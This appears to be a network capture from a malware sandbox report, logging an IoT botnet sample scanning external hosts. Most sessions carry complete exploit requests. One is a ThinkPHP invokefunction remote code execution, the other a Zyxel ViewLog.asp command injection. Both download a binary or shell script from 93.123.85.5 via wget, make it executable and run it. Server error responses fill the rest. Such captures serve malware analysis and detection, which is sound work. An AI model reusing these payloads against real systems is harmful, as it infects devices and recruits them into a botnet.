                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              318192.168.2.2354018112.74.48.1380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:57.895551920 CET7166OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:58.229928970 CET7205INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:18:58 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip
                                                              Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              319192.168.2.235347695.217.192.7680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:58.537305117 CET7208OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:58.848160028 CET7294INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:18:58 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              32192.168.2.234728631.136.108.2048080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:12.524107933 CET1648OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:13.523735046 CET1764OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:15.507467985 CET1987OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:19.474976063 CET2463OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:27.409976959 CET3460OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:43.288924932 CET5391OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:16.043565989 CET9443OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              320192.168.2.235142695.168.198.7580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:58.538469076 CET7209OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:58.851238012 CET7298INHTTP/1.1 400 Bad Request
                                                              Server: nginx/1.10.3
                                                              Date: Mon, 13 Nov 2023 21:18:58 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 173
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              321192.168.2.233780895.97.58.4380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:58.541428089 CET7209OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:58.871311903 CET7306INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:18:58 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              322192.168.2.234533085.208.23.588080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:59.142836094 CET7320OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:59.454349995 CET7328INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:18:59 GMT
                                                              Server: Apache
                                                              Content-Length: 362
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              323192.168.2.234205695.216.96.2438080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:59.149775028 CET7321OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:59.467473030 CET7329INHTTP/1.1 404 Not Found
                                                              Content-Security-Policy: frame-src 'self' https://traefik.io https://*.traefik.io;
                                                              Content-Type: text/plain; charset=utf-8
                                                              X-Content-Type-Options: nosniff
                                                              Date: Mon, 13 Nov 2023 21:18:59 GMT
                                                              Content-Length: 19
                                                              Connection: close
                                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                              Data Ascii: 404 page not found


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              324192.168.2.234370031.170.55.358080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:59.517720938 CET7330OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              325192.168.2.234899231.136.3.308080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:59.789001942 CET7415OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:00.781569958 CET7543OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:02.797280073 CET7724OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:06.828783035 CET8301OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:15.019665003 CET9315OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:31.145612001 CET11236OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:03.141355991 CET15292OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              326192.168.2.235657694.123.176.2348080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:59.789849043 CET7415OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              327192.168.2.235496431.200.38.618080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:59.799109936 CET7416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              328192.168.2.233871862.15.160.78080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:00.186400890 CET7444OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:00.521004915 CET7454INHTTP/1.1 404 Not Found
                                                              Date: Mon, 13 Nov 2023 21:18:59 GMT
                                                              Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/5.6.40
                                                              Vary: accept-language,accept-charset
                                                              Content-Length: 439
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
